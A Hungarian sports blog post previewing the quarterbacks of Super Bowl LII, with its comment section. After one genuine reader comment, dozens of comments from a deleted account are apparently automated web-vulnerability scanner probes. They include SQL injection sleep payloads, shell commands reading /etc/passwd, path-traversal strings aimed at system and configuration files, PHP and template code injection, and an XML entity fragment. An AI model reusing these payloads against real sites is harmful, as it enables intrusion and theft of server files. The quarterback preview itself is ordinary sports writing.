Újra működünk, köszi a türelmet!

Super Bowl LII beharangozó #1: Az irányítók

2018. január 29., 01:25

Elkezdődött a szezon végső visszaszámlálása; 7 nap, 7 cikk az NFL fináléjáról!

Super Bowl LII beharangozó #1: Az irányítók


NEW ENGLAND PATRIOTS

Szerintem a sportág szerelmesei közül senkinek sem kell különösképpen bemutatnom a Pats quarterbackjét, Tom Brady-t. A már most öt bajnoki gyűrűvel rendelkező játékos szinte biztosan a Hírességek Csarnokába kerül majd visszavonulásakor. Kérdés, ki fogadott erre 2000 tavaszán, mikor mindössze a draft hatodik körében került kiválasztásra a Michigan Wolverines egyetemi csapatában pallérozódott irányító. Akkor újoncként még csupán sokadik számú QB volt, ám második évében már ő volt a fő tartalék, így Drew Bledsoe sérülése miatt hamar a kezdőben találta magát és élni tudott a lehetőséggel, egészen a nagydöntőig vezette a Hazafiakat, akikkel szemben akkor a jóval esélyesebb St. Louis Rams állt. A Kurt Warner vezette Kosokat végül egy utolsó másodperces Vinatieri mezőnygóllal gyűrte le a Pats, Brady megkapta a döntő legjobbjának járó MVP címet, és gyakorlatilag azóta szinte minden szezon előtt a New Englandet a végső esélyesek között kell megemlíteni. A Patriotsnak sikerült a 2001-es siker után még 2003-ban és 2004-ben is begyűjtenie a Vince Lombardi Trófeát, végképp dinasztiává válva. Azóta még a 2014-es és a 2016-os idényben sikerült a győzelem, a 2007-es és a 2011-es szezon Super Bowljában azonban a vesztes oldalra kerültek Bradyék, a Giants mindkétszer keresztülhúzta a számításaikat. A 2007-es volt az emlékezetes, 16-0-ás, makulátlan mérleggel záródott alapszakasz, amely során Brady megdöntötte Peyton Manning egy szezonban dobott TD passzainak számát, kerek 50 hat pontot érő átadást felmutatva (ezt a rekordot 2013-ban Peyton Manning visszavette). Talán az volt Brady egyik legsikeresebb éve, amit egy balszerencsés "szezon" követett. Azért idézőjeles a "szezon" kifejezés, mert a nyitómeccsen Pollard, a Chiefs safetyje úgy vitte földre az irányítót, hogy az egész szezonra kidőlt, nem is lett meg a rájátszás a Patriótáknak. Sokakban ekkor bizonyára megfogalmazódott a kérdés, hogy Brady képes lesz-e továbbra is ilyen szinten teljesíteni majd a sérülése után, nos, azóta tudjuk, hogy a válasz igen.


Többek között az idei év is ezt bizonyítja, Brady 40 évesen is a legtöbb passzolt yarddal a 2017-es alapszakaszt, amihez 102.8-as QB rating párosult, tehát nem mondhatni, hogy kiégett volna. Február negyedikén a hatodik bajnoki gyűrűjét szerezheti meg. A New England inkább a gyors, rövid passzokra fókuszál, ebből tudnak haladni, rendkívül eredményesen. Brady előszeretettel találja meg a kedvenc célpontjainak számító tight endet, Rob Gronkowskit és mellette a három elkapót, Brandin Cooksot, Danny Amendolát és Chris Hogant. Természetesen a rövid passzok hatékonysága nem azt jelenti, hogy nincs benne a Pats támadóiban egy-egy hosszú játék, csak nem ez a tendencia. Brady ráadásul olyan típusú játékos, aki az előzetesen gyengébb képességűnek ítélt elkapóit is képes "naggyá tenni", remekül lát a pályán, nagyon gyors a dobómozdulata, és általában pontos is, a passzkísérleteinek csupán 1.4%-a lett interception, ez Tyrod Taylor és Alex Smith mögött a 3. legjobb mutató a ligában. Egy ötszörös bajnok játékossal szemben nyilván nem az lesz a kérdés február hatodikán sem, hogy képes lesz-e felnőni a feladathoz. Sokkal inkább az, hogy mennyi védelmet kap a faltól és mennyi ideje lesz megtalálni célpontjait, az Eagles védőfal és Jim Schwartz védőkoordinátor személyében komoly kihívás vár rá.

Brady cseréje a 32 éves Brian Hoyer, aki először 2009-2011 között volt Brady cseréje, majd a jelenlegi idény során Brady korábbi cseréjét, Jimmy Garoppolot San Franciscoba cserélte Bill Belichick, így Hoyer létszám felettivé vált a 49ersnél és visszatér a Patriotshoz. Tapasztalt irányítóról beszélünk, aki 2015-ben a Houston Texans színeiben még rájátszásmeccsen is kezdett, bár az ottani teljesítményére nem lehet túl büszke, 4 interceptiont dobott, a Kansas City Chiefs pedig 30-0 arányban győzedelmeskedett.

 

PHILADELPHIA EAGLES

Nagy valószínűséggel nem jutottak volna eddig a sasok, ha nem Carson Wentz-cel kezdik meg a szezont a center alatt, a 2016-os draft 1/2-ese MVP-formában játszott az alapszakaszban egészen a decemberi 10-i Los Angeles Rams elleni mérkőzésig, ahol ACL-szakadást szenvedett.

Wentz helyettese Nick Foles lett, akit 2012-ben az Eagles draftolt a 3. körben, 3 évet töltött Philadelphiában (2013-ban Pro Bowl szezont hozott Chip Kelly keze alatt), majd a Sam Bradford-csere keretében a Ramshez került, ahol Jared Goff draftolása után létszám felettivé vált, ezután korábbi edzőjéhez, Andy Reidhez csatlakozott a Chiefsnél, ahonnan 1 év után visszatért Philadelphiába.
Foles Texasban, Austinban nevelkedett, a Westlake High School diákja volt, akárcsak korábban Drew Brees, csapattársa volt a Baltimore Ravens rúgója, Justin Tucker. Kitűnő kosárlabdázó volt, három évig kezdett a Westlake színeiben, kétszer lett csapatának MVP-je, ösztöndíj ajánlata volt a Georgetownról a Baylorról és a Texastól is. Footballösztöndíjak között is tudott válogatni, többek között a Virginia, az Ole Miss, a Duke és a Rutgers hívószavára mondott nemet és választotta Michigan State-et. A 2007-es Spartans igen jó irányítóhelyzettel bírt, konkrétan az imént említett Brian Hoyer volt a kezdő, mögötte volt Foles a csere, de a kerethez tartozott már pl. Kirk Cousins is, aki ekkoriban 4. számú (!) QB volt a Spartansban. A nagy konkurencia miatt 1 év után az Arizonára transzferelt Foles, ahol a redshirt szezonja után megnyerte a pozíciós csatát Matt Scott-tal szemben, így végül 3 évig volt a Wildcats kezdő irányítója, mellette kommunikáció szakon le is diplomázott.


Foles karrierjének az eddigi csúcspontja (a mostani Super Bowl részvételt leszámítva) a 2013-as szezon volt, vezette a ligát passer ratingben ebben az évben, megjárta a Pro Bowl-t, ahol MVP címet is szerzett. Abban az évben a Raiders elleni meccset 7 TD-passzal zárta, ami NFL rekordbeállítás, olyan nagyságokkal tartja ezt a csúcsot társbérletben mint Drew Brees, Peyton Manning, Joe Kapp, Y.A. Tittle, George Blanda, Adrian Burk vagy Sid Luckman. Érdekességként meg lehet jegyezni, hogy Foles sógora Evan Moore szintén egykori NFL-játékos, 5 évet húzott le a ligában tight endként (Moore másik sógora egyébként az egykori Saints WR Chase Lyman), jelenleg a Pac-12 Network elemzője, mellette egyik alapítója a Case Keenumos cikkünkben említett STRIVR cégnek, aki virtuális valóságbeli edzéseket biztosít a sportolóknak.

Foles cseréje Nate Sudfeld, aki anno 3 évig volt kezdő az Indiana egyetemen, mielőtt a 2016-os draft 6. körében kiválasztotta a Washington Redskins, ahol a már említett Kirk Cousins, valamint Colt McCoy mögött volt 3. számú irányító. 2017. szeptember 2.-án cutolta őt a Skins, 3.-án már az Eagles gyakorlócsapatának volt a tagja, Wentz sérülésével került fel az 53-as keretbe, a tét nélküli Dallas Cowboys elleni meccsen be is vetették, ahol 23 passzából 19 volt sikeres 134 yardért, 83 %-os pontossága NFL-rekord debütáló meccsen (minimum 20 passzkísérlet esetén), Sam Wyche csúcsát adta át a múltnak. Bátyja Zach tight endként szintén megjárta az NFL-t, leginkább a Jetsből ismerhetjük. 

 

szerző: Papp Gábor (empty taxi)


Hozzászólások

több mint 6 éve
eaglesmcnabb Philadelphia Eagles Virginia Tech Hokies 4 — KARTAL CITY CHIEFS örökös fantasy 2. helyezett
"a passzkísérleteinek csupán 1.4%-a lett interception, ez Tyrod Taylor és Alex Smith mögött a 3. legjobb mutató a ligában."

is there any question? :d

No 1. Kyle Pitts, Jordan Mailata, Amari Cooper, Myles Garrett, Jerry Jeudy és Nick Chubb fan!!!
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
response.write(9002603*9856832)
több mint 6 éve
Törölt felhasználó
'+response.write(9002603*9856832)+'
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
"+response.write(9002603*9856832)+"
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
&cat /etc/passwd&
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
20 and sleep(4)
több mint 6 éve
Törölt felhasználó
'&cat /etc/passwd&'
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
20 or (sleep(4)+1) limit 1 --
több mint 6 éve
Törölt felhasználó
"&cat /etc/passwd&"
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
20' and sleep(4)='
több mint 6 éve
Törölt felhasználó
cat /etc/passwd
több mint 6 éve
Törölt felhasználó
20' and (sleep(4)+1) limit 1 --
több mint 6 éve
Törölt felhasználó
`cat /etc/passwd`
több mint 6 éve
Törölt felhasználó
../../../../../../../../../../etc/passwd
több mint 6 éve
Törölt felhasználó
SomeCustomInjectedHeader:injected_by_wvs
több mint 6 éve
Törölt felhasználó
20" and sleep(4)="
több mint 6 éve
Törölt felhasználó
|cat /etc/passwd#
több mint 6 éve
Törölt felhasználó
SomeCustomInjectedHeader:injected_by_wvs
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
20' or (sleep(4)+1) limit 1 --
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
'|'ld
több mint 6 éve
Törölt felhasználó
20" or (sleep(4)+1) limit 1 --
több mint 6 éve
Törölt felhasználó
${99520+100194}
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n
több mint 6 éve
Törölt felhasználó
"|"ld
több mint 6 éve
Törölt felhasználó
268435455
több mint 6 éve
Törölt felhasználó
20'=sleep(4)='
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
több mint 6 éve
Törölt felhasználó
;cat /etc/passwd;
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
több mint 6 éve
Törölt felhasználó
20"=sleep(4)="
több mint 6 éve
Törölt felhasználó
';cat /etc/passwd;'
több mint 6 éve
Törölt felhasználó
/../..//../..//../..//../..//../..//etc/passwd.jpg
több mint 6 éve
Törölt felhasználó
több mint 6 éve
Törölt felhasználó
20;select pg_sleep(4); --
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
20&n969386=v934594
több mint 6 éve
Törölt felhasználó
1some_inexistent_file_with_long_name%00.jpg
több mint 6 éve
Törölt felhasználó
";cat /etc/passwd;"
több mint 6 éve
Törölt felhasználó
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
több mint 6 éve
Törölt felhasználó
1e309
több mint 6 éve
Törölt felhasználó
20';select pg_sleep(4); --
több mint 6 éve
Törölt felhasználó
)
több mint 6 éve
Törölt felhasználó
 testasp.vulnweb.com/t/fit.txt?%00.jpg
több mint 6 éve
Törölt felhasználó
/etc/passwd
több mint 6 éve
Törölt felhasználó
||cat /etc/passwd
több mint 6 éve
Törölt felhasználó
'"\'\");|]*{
<>
több mint 6 éve
Törölt felhasználó
20; waitfor delay '0:0:4' --
több mint 6 éve
Törölt felhasználó
testasp.vulnweb.com
több mint 6 éve
Törölt felhasználó
!(()&&!|*|*|
több mint 6 éve
Törölt felhasználó
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
20'; waitfor delay '0:0:4' --
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
^(#$!@#$)(()))******
több mint 6 éve
Törölt felhasználó
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
több mint 6 éve
Törölt felhasználó
'&dir&'
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
20"; waitfor delay '0:0:4' --
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
több mint 6 éve
Törölt felhasználó
"&dir&"
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
|dir
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
'"()
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
file:///etc/passwd
több mint 6 éve
Törölt felhasználó
'|dir
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
"|dir
több mint 6 éve
Törölt felhasználó
/\../\../\../\../\../\../\../etc/passwd
több mint 6 éve
Törölt felhasználó
;print(md5(acunetix_wvs_security_test));
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
 testasp.vulnweb.com/t/xss.html?%00.jpg
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
';print(md5(acunetix_wvs_security_test));$a='
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
WEB-INF/web.xml
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
";print(md5(acunetix_wvs_security_test));$a="
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
 testasp.vulnweb.com/t/fit.txt
több mint 6 éve
Törölt felhasználó
WEB-INF\web.xml
több mint 6 éve
Törölt felhasználó
acunetix_wvs_invalid_filename
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
${@print(md5(acunetix_wvs_security_test))}
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
../../../../../../../../../../windows/win.ini
több mint 6 éve
Törölt felhasználó
comment
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
${@print(md5(acunetix_wvs_security_test))}\
több mint 6 éve
Törölt felhasználó
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
több mint 6 éve
Törölt felhasználó
//www.acunetix.tst
több mint 6 éve
Törölt felhasználó
../../../../../../../../../../boot.ini
több mint 6 éve
Törölt felhasználó
1'"
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
comment/.
több mint 6 éve
Törölt felhasználó
../../../../../../../../../../windows/win.ini.jpg
több mint 6 éve
Törölt felhasználó
\
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó


]>
&acunetixent;
több mint 6 éve
Törölt felhasználó
'"
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
több mint 6 éve
Törölt felhasználó
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó
20
több mint 6 éve
Törölt felhasználó